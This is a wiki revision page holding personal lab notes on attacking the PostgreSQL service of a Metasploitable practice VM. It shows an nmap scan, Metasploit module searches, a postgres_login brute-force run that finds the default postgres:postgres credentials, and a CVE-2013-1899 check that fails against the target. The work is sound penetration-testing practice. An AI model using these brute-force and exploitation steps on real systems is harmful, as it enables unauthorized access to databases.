Metasploitable/Postgres: Difference between revisions
From charlesreid1
| Line 204: | Line 204: | ||
Things I'm not sure about: | Things I'm not sure about: | ||
* mainly how you know what database names are | * mainly how you know what database names are | ||
After setting and unsetting a few variable values, we're ready to rock: | |||
<pre> | <pre> | ||
| Line 231: | Line 233: | ||
USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt no File containing users, one per line | USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt no File containing users, one per line | ||
VERBOSE true yes Whether to print output for all attempts | VERBOSE true yes Whether to print output for all attempts | ||
</pre> | |||
===First Results=== | |||
First results from running the exploit show that we have one guess where the username and password are correct but the database name is not. Here, the postgres database has a username postgres and a password postgres, but the database is not named postgres: | |||
<pre> | |||
msf auxiliary(postgres_login) > run | msf auxiliary(postgres_login) > run | ||
| Line 246: | Line 251: | ||
[*] Auxiliary module execution completed | [*] Auxiliary module execution completed | ||
</pre> | </pre> | ||
Unfortunately, if we are trying to brute-force this login with a huge list of credentials, and we happen to find the correct credentials, we would never know: the "C3D000" error message would fly by, telling us we had correctly guessed the username and password but not the dbname, and it would be forever lost unless we were capturing output to a console. That's also wasted time. | |||
==Postgres dbname flag injection== | ==Postgres dbname flag injection== | ||
Revision as of 09:52, 25 March 2016
This page covers activities on the Metasploitable virtualbox related to the postgresql service that is running.
Recon
Recon
Reminder, the remote machine (Metasploitable) is available at 10.0.0.27.
$ nmap -sS -sV -A 10.0.0.27 Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-22 18:30 PDT Nmap scan report for 10.0.0.27 Host is up (0.016s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2010-03-17T14:07:45 |_Not valid after: 2010-04-16T14:07:45 |_ssl-date: 2016-03-23T01:31:31+00:00; +33s from scanner time. 53/tcp open domain ISC BIND 9.4.2 | dns-nsid: |_ bind.version: 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 |_http-title: Metasploitable2 - Linux 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 42810/tcp mountd | 100005 1,2,3 45599/udp mountd | 100021 1,3,4 34385/tcp nlockmgr | 100021 1,3,4 60702/udp nlockmgr | 100024 1 38085/udp status |_ 100024 1 52004/tcp status 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login? 514/tcp open tcpwrapped 1099/tcp open java-rmi Java RMI Registry 1524/tcp open shell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 | mysql-info: | Protocol: 53 | Version: .0.51a-3ubuntu5 | Thread ID: 8 | Capabilities flags: 43564 | Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression | Status: Autocommit |_ Salt: w$K,8vk7k8tagd@PR*zK 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) | vnc-info: | Protocol version: 3.3 | Security types: |_ Unknown security type (33554432) 6000/tcp open X11 (access denied) 6667/tcp open irc Unreal ircd | irc-info: | users: 1 | servers: 1 | lusers: 1 | lservers: 0 | server: irc.Metasploitable.LAN | version: Unreal3.2.8.1. irc.Metasploitable.LAN | uptime: 0 days, 1:05:20 | source ident: nmap | source host: 6D4CD63B.D3975B40.7B559A54.IP |_ error: Closing Link: cxfhgnbdt[10.0.0.25] (Quit: cxfhgnbdt) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_ajp-methods: Failed to get a valid response for the OPTION request 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/5.5 MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP |_ System time: 2016-03-22T21:31:31-04:00 TRACEROUTE HOP RTT ADDRESS 1 16.11 ms 10.0.0.27 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds
Search Metasploit for Exploits
msf auxiliary(postgres_version) > search postgresql Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal Ruby on Rails Devise Authentication Password Reset auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query auxiliary/admin/postgres/postgres_sql normal PostgreSQL Server Generic Query auxiliary/scanner/postgres/postgres_dbname_flag_injection normal PostgreSQL Database Name Command Line Flag Injection auxiliary/scanner/postgres/postgres_login normal PostgreSQL Login Utility auxiliary/scanner/postgres/postgres_version normal PostgreSQL Version Probe auxiliary/server/capture/postgresql normal Authentication Capture: PostgreSQL exploit/linux/postgres/postgres_payload 2007-06-05 excellent PostgreSQL for Linux Payload Execution exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection exploit/windows/postgres/postgres_payload 2009-04-10 excellent PostgreSQL for Microsoft Windows Payload Execution post/linux/gather/enum_users_history normal Linux Gather User History
Scanner
One of the first pieces of information you will need, even before running a brute-force attack on a PostgreSQL login, is a database name.
Postgres login
The postgresql login attack is at
msf > use auxiliary/scanner/postgres/postgres_login
Info
Information/description of the postgres login attack is given below:
Description: This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.
The various options for the postgres login attack are given below:
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DATABASE template1 yes The database to authenticate against DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RETURN_ROWSET true no Set to true to see query result sets RHOSTS yes The target address range or CIDR identifier RPORT 5432 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME postgres no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts
Set Variables
To do this attack, we will want to set the following variables:
- try blank passwords
- set bruteforce speed to 5
- database - ??? (postgresql, or same databases as mysql)
- password file (see Kali/Wordlists)
- remote hosts 10.0.0.27 (metasploitable machine)
- stop on success true
- username file (contains root, guest, postgres)
- verbose
Things I'm not sure about:
- mainly how you know what database names are
After setting and unsetting a few variable values, we're ready to rock:
msf auxiliary(postgres_login) > show options Module options (auxiliary/scanner/postgres/postgres_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DATABASE postgresql yes The database to authenticate against DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RETURN_ROWSET true no Set to true to see query result sets RHOSTS 10.0.0.27 yes The target address range or CIDR identifier RPORT 5432 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME root no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts
First Results
First results from running the exploit show that we have one guess where the username and password are correct but the database name is not. Here, the postgres database has a username postgres and a password postgres, but the database is not named postgres:
msf auxiliary(postgres_login) > run [-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: root:@postgresql (Incorrect: Invalid username or password) [-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: postgres:postgres@postgresql (Incorrect: C3D000, Creds were good but database was bad) [-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: postgres:password@postgresql (Incorrect: Invalid username or password) [-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: postgres:admin@postgresql (Incorrect: Invalid username or password) [-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: admin:admin@postgresql (Incorrect: Invalid username or password) [-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: admin:password@postgresql (Incorrect: Invalid username or password) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Unfortunately, if we are trying to brute-force this login with a huge list of credentials, and we happen to find the correct credentials, we would never know: the "C3D000" error message would fly by, telling us we had correctly guessed the username and password but not the dbname, and it would be forever lost unless we were capturing output to a console. That's also wasted time.
Postgres dbname flag injection
This is a pretty hefty exploit that gives you a foothold in a machine. However, it won't work on this metasploitable virtualbox.
Use the postgres_dbname_flag_injection exploit:
msf > use auxiliary/scanner/postgres/postgres_dbname_flag_injection
Information about Exploit
These two commands will show some basic and advanced information about the exploit:
msf auxiliary(postgres_dbname_flag_injection) > info auxiliary/scanner/postgres/postgres_dbname_flag_injection msf auxiliary(postgres_dbname_flag_injection) > advanced auxiliary/scanner/postgres/postgres_dbname_flag_injection
Here is the output of basic information:
msf auxiliary(postgres_dbname_flag_injection) > info auxiliary/scanner/postgres/postgres_dbname_flag_injection
Name: PostgreSQL Database Name Command Line Flag Injection
Module: auxiliary/scanner/postgres/postgres_dbname_flag_injection
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
hdm <x@hdm.io>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 5432 yes The target port
THREADS 1 yes The number of concurrent threads
Description:
This module can identify PostgreSQL 9.0, 9.1, and 9.2 servers that
are vulnerable to command-line flag injection through CVE-2013-1899.
This can lead to denial of service, privilege escalation, or even
arbitrary code execution.
References:
http://cvedetails.com/cve/2013-1899/
http://www.postgresql.org/support/security/faq/2013-04-04/
We can show the basic options: msf auxiliary(postgres_dbname_flag_injection) > show options Module options (auxiliary/scanner/postgres/postgres_dbname_flag_injection): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 5432 yes The target port THREADS 1 yes The number of concurrent threads <pre> msf auxiliary(postgres_dbname_flag_injection) > set RHOSTS 10.0.0.27 RHOSTS => 10.0.0.27 msf auxiliary(postgres_dbname_flag_injection) > set RPORT 5432 RPORT => 5432 |
Now we can show the advanced options:
msf auxiliary(postgres_dbname_flag_injection) > advanced
Module advanced options (auxiliary/scanner/postgres/postgres_dbname_flag_injection):
Name : CHOST
Current Setting:
Description : The local client address
Name : CPORT
Current Setting:
Description : The local client port
Name : ConnectTimeout
Current Setting: 10
Description : Maximum number of seconds to establish a TCP connection
Name : Proxies
Current Setting:
Description : A proxy chain of format type:host:port[,type:host:port][...]
Name : SSL
Current Setting: false
Description : Negotiate SSL for outgoing connections
Name : SSLCipher
Current Setting:
Description : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
Name : SSLVerifyMode
Current Setting: PEER
Description : SSL verification method (Accepted: CLIENT_ONCE,
FAIL_IF_NO_PEER_CERT, NONE, PEER)
Name : SSLVersion
Current Setting: TLS1
Description : Specify the version of SSL/TLS to be used (TLS and SSL23 are
auto-negotiate) (Accepted: SSL2, SSL3, SSL23, TLS, TLS1, TLS1.1,
TLS1.2)
Name : ShowProgress
Current Setting: true
Description : Display progress messages during a scan
Name : ShowProgressPercent
Current Setting: 10
Description : The interval in percent that progress should be shown
Name : VERBOSE
Current Setting: false
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
|
When an Exploit Doesn't Work
This version of PostgreSQL is actually too old to be vulnerable to the postgres_dbname_flag_injection exploit.
msf auxiliary(postgres_dbname_flag_injection) > set RHOSTS 10.0.0.27 RHOSTS => 10.0.0.27 msf auxiliary(postgres_dbname_flag_injection) > run [*] 10.0.0.27:5432 does not appear to be vulnerable to CVE-2013-1899 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Related
